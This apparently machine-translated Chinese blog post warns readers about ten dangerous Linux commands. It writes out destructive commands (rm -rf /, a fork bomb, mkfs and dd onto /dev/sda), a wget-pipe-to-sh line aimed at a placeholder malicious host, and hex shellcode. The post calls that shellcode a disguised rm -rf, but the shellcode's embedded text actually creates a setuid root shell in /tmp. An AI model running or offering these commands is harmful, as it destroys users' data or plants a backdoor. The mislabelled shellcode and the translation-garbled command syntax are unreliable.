继续浏览精彩内容
慕课网APP
程序员的梦工厂
打开
继续
感谢您的支持,我会继续努力的
赞赏金额会直接到老师账户
将二维码发送给自己后长按识别
微信支付
支付宝支付

10个极其危险的linux命令,千万不要在你的系统上执行!

豆包同学在路上
关注TA
已关注
手记 35
粉丝 0
获赞 17

Linux命令行是高效,有用和有趣的,但是有时当您不确定自己在做什么时,它可能非常危险。本文的目的不是使您对Linux或Linux命令行感到愤怒。我们只想让您了解一些命令,在执行它们之前您应该三思。

1. rm -rf命令

该-rf RM命令来删除文件夹及其内容的最快方式之一。但是一点错字或无知可能会导致无法恢复的系统损坏。rm命令使用的一些选项是。

  • Linux中的rm命令用于删除文件。
  • rm -r命令以递归方式删除该文件夹,即使是空文件夹也是如此。
  • rm -f命令无需询问即可删除“只读文件”。
  • rm -rf /:强制删除根目录中的所有内容。
  • rm -rf *:强制删除当前目录/工作目录中的所有内容。
  • rm -rf。:强制删除当前文件夹和子文件夹。

因此,在执行rm -rf命令时要小心。为了克服通过“ rm ”命令意外删除文件的麻烦,请在“ .bashrc ”文件中将“ rm ”命令的别名创建为“ rm -i ” ,它将要求您确认每次删除。

2.:(){:|:&} ;:命令

以上实际上是一枚叉子炸弹。它通过定义一个称为“ : ” 的函数进行操作,该函数两次调用自身,一次在前台,一次在后台。它会不断执行,直到系统冻结。

:(){:|:&}; ::

3.命令> / dev / sda

上面的命令将’ command ’ 的输出写在块/ dev / sda上。上面的命令写入原始数据,并且块上的所有文件都将替换为原始数据,从而导致块上的数据完全丢失。

4. mv文件夹/ dev / null

上面的命令会将“ 文件夹 ” 移动到/ dev / null。在Linux中,/ dev / null或null设备是一个特殊的文件,该文件将丢弃所有写入其中的数据并报告写操作成功。

#mv / home / user / * / dev / null

上面的命令会将User目录的所有内容移动到/ dev / null,这实际上意味着所有内容都已发送到blackhole(null)。

5. wget http:// malicious_source -O- | SH

上面的命令将从恶意源下载脚本,然后执行它。Wget命令将下载脚本,而sh将执行下载的脚本。

注意:您应该非常了解从中下载软件包和脚本的源。仅使用从受信任来源下载的那些脚本/应用程序。

6. mkfs.ext3 / dev / sda

上面的命令将格式化块“ sda”,您肯定会知道执行完上述命令后,您的块(硬盘驱动器)将是全新的,全新的!没有任何数据,将使系统进入不可恢复的阶段。

7.>文件

上面的命令用于刷新文件的内容。如果执行上述命令时遇到错字或无知,例如“ > xt.conf”,则会写入配置文件或任何其他系统或配置文件。

8. ^ foo ^ bar

此命令用于编辑先前的run命令,而无需再次重新键入整个命令。但是,如果您没有冒用^ foo ^ bar命令彻底检查原始命令中的更改的风险,那么这确实很麻烦。

9. dd if = / dev / random = / dev / sda

上面的命令将擦除sda块并将随机的垃圾数据写入该块。当然!您的系统将处于不一致且不可恢复的阶段。

10.隐藏命令

下面的命令不过是上面的第一个命令(rm -rf)。这里的代码隐藏在十六进制中,因此无知的用户可能会被愚弄。在终端中运行以下代码将擦除您的根分区。

此命令在此表明威胁可能是隐藏的,有时通常无法检测到。您必须知道自己在做什么以及将会得到什么结果。不要编译/运行来自未知来源的代码。

char esp [] __attribute__((section(“。text”)))/ * esp 释放 */ =“ \ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68” “ \ xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99” “ \ xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7” “ \ x56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56” “ \ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31” “ \ xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69” “ \ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00” “ cp -p / bin / sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

注意:请勿在您的Linux终端或[Shell]或您的朋友或学校计算机中执行上述任何命令。如果要测试它们,请在虚拟机中运行它们。由于执行上述命令而导致的任何不一致或数据丢失都将导致您的系统崩溃。**

本文转自网络,文章版权归原作者所有。暂未找到原作者,如有知晓请留言。

打开App,阅读手记
0人推荐
发表评论
随时随地看视频慕课网APP